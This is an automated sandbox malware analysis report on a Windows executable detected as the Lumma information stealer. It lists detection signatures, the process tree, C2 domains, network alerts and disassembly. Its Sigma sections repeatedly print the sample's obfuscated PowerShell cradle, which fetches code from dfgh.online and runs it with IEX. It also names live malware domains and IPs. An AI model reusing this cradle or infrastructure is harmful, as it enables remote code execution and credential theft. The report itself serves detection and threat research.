Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-UpFile_v25.exe

Overview

General Information

Sample name:Set-UpFile_v25.exe
Analysis ID:1585343
MD5:2f33775c502e7b2d60b9bfe944b46863
SHA1:57d023419ecbe81d27368757fea4366de68891ea
SHA256:fce2d6446420934b428053edf66b7cc5838717fbf67911c11145424ebd0a045b
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Set-UpFile_v25.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\Set-UpFile_v25.exe" MD5: 2F33775C502E7B2D60B9BFE944B46863)
    • powershell.exe (PID: 7596 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cloudewahsj.shop", "tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop", "beattalkerz.cyou", "framekgirus.shop", "noisycuttej.shop", "nearycrepso.shop"], "Build id": "hRjzG3--ZINA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x5151f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: Set-UpFile_v25.exe PID: 7272JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Set-UpFile_v25.exe PID: 7272JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Set-UpFile_v25.exe PID: 7272JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: PowerShell Download and Execution Cradles
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-UpFile_v25.exe", ParentImage: C:\Users\user\Desktop\Set-UpFile_v25.exe, ParentProcessId: 7272, ParentProcessName: Set-UpFile_v25.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7596, ProcessName: powershell.exe
            Sigma detected: Suspicious PowerShell Parameter Substring
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-UpFile_v25.exe", ParentImage: C:\Users\user\Desktop\Set-UpFile_v25.exe, ParentProcessId: 7272, ParentProcessName: Set-UpFile_v25.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7596, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-UpFile_v25.exe", ParentImage: C:\Users\user\Desktop\Set-UpFile_v25.exe, ParentProcessId: 7272, ParentProcessName: Set-UpFile_v25.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7596, ProcessName: powershell.exe
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-UpFile_v25.exe", ParentImage: C:\Users\user\Desktop\Set-UpFile_v25.exe, ParentProcessId: 7272, ParentProcessName: Set-UpFile_v25.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7596, ProcessName: powershell.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-UpFile_v25.exe", ParentImage: C:\Users\user\Desktop\Set-UpFile_v25.exe, ParentProcessId: 7272, ParentProcessName: Set-UpFile_v25.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7596, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-UpFile_v25.exe", ParentImage: C:\Users\user\Desktop\Set-UpFile_v25.exe, ParentProcessId: 7272, ParentProcessName: Set-UpFile_v25.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7596, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T14:37:11.659198+010020283713Unknown Traffic192.168.2.449748104.21.25.52443TCP
            2025-01-07T14:37:12.609952+010020283713Unknown Traffic192.168.2.449749104.21.25.52443TCP
            2025-01-07T14:37:13.913865+010020283713Unknown Traffic192.168.2.449750104.21.25.52443TCP
            2025-01-07T14:37:15.152429+010020283713Unknown Traffic192.168.2.449751104.21.25.52443TCP
            2025-01-07T14:37:16.395868+010020283713Unknown Traffic192.168.2.449752104.21.25.52443TCP
            2025-01-07T14:37:22.773652+010020283713Unknown Traffic192.168.2.449754104.21.25.52443TCP
            2025-01-07T14:37:24.415568+010020283713Unknown Traffic192.168.2.449755104.21.25.52443TCP
            2025-01-07T14:37:26.047768+010020283713Unknown Traffic192.168.2.449756104.21.25.52443TCP
            2025-01-07T14:37:28.145395+010020283713Unknown Traffic192.168.2.449757104.21.25.52443TCP
            2025-01-07T14:37:29.414835+010020283713Unknown Traffic192.168.2.449758185.161.251.21443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T14:37:12.141741+010020546531A Network Trojan was detected192.168.2.449748104.21.25.52443TCP
            2025-01-07T14:37:13.061485+010020546531A Network Trojan was detected192.168.2.449749104.21.25.52443TCP
            2025-01-07T14:37:28.640242+010020546531A Network Trojan was detected192.168.2.449757104.21.25.52443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T14:37:12.141741+010020498361A Network Trojan was detected192.168.2.449748104.21.25.52443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T14:37:13.061485+010020498121A Network Trojan was detected192.168.2.449749104.21.25.52443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T14:37:24.859758+010020480941Malware Command and Control Activity Detected192.168.2.449755104.21.25.52443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T14:37:26.052786+010028438641A Network Trojan was detected192.168.2.449756104.21.25.52443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://klipvumisui.shop/int_clp_sha.txt%Avira URL Cloud: Label: malware
            Source: https://klipvumisui.shop/int_clp_sha.txtf1R=Avira URL Cloud: Label: malware
            Source: https://klipvumisui.shop:443/int_clp_sha.txtAvira URL Cloud: Label: malware
            Source: https://klipvumisui.shop/int_clp_sha.txtcodedAvira URL Cloud: Label: malware
            Source: https://dfgh.online/invoker.php?compName=user-PCxAvira URL Cloud: Label: malware
            Source: https://klipvumisui.shop/int_clp_sha.txt.3Avira URL Cloud: Label: malware
            Found malware configuration
            Source: Set-UpFile_v25.exe.7272.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop", "beattalkerz.cyou", "framekgirus.shop", "noisycuttej.shop", "nearycrepso.shop"], "Build id": "hRjzG3--ZINA"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
            Source: Set-UpFile_v25.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981135607.0000000006D0A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_029AA1F9
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_029AB28E
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_029AA282
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then push ebx0_2_029BE2C2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp esi, edx0_2_029BE2C2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]0_2_02983A12
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0299A202
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then jmp ecx0_2_0299038C
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_029AFBD2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_0298DBD2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_0299A3E3
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0150E4D7h]0_2_0299A3E3
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov word ptr [eax], cx0_2_029963E2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov edi, eax0_2_0298AB12
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov ecx, eax0_2_0298AB12
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0299CB12
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_029C4362
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_029968A7
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-68B18956h]0_2_0298C8E2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov dword ptr [ebp-28h], eax0_2_029AD811
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx ecx, byte ptr [esi+edx+4F334F6Fh]0_2_029AD811
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-4ADCAC34h]0_2_0298C035
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_029A4852
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp ah, 0000002Eh0_2_029AB041
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000298h]0_2_02997070
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_029A11F2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 53585096h0_2_029969E8
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov ebp, dword ptr [esp+04h]0_2_029969E8
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 0E4A4AE9h0_2_029901EA
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx-53h]0_2_0298CE9F
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000BBh]0_2_0298E6BD
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then test esi, esi0_2_029BE6B2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov dword ptr [esp], eax0_2_0299EEB2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov eax, ecx0_2_0299D6A3
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0299D6A3
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+000001DFh]0_2_02997ED9
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_029AE612
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+01h]0_2_029A1622
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_029ACE22
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov dword ptr [edi], F073F2F5h0_2_0298CE43
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov ecx, eax0_2_029C3672
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_029A0F82
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_02988F82
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_02988F82
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-3EEFCD92h]0_2_029C1702
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_029C0F02
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_02998744
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_02998744
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then mov ecx, eax0_2_0299C4EB
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0299B442
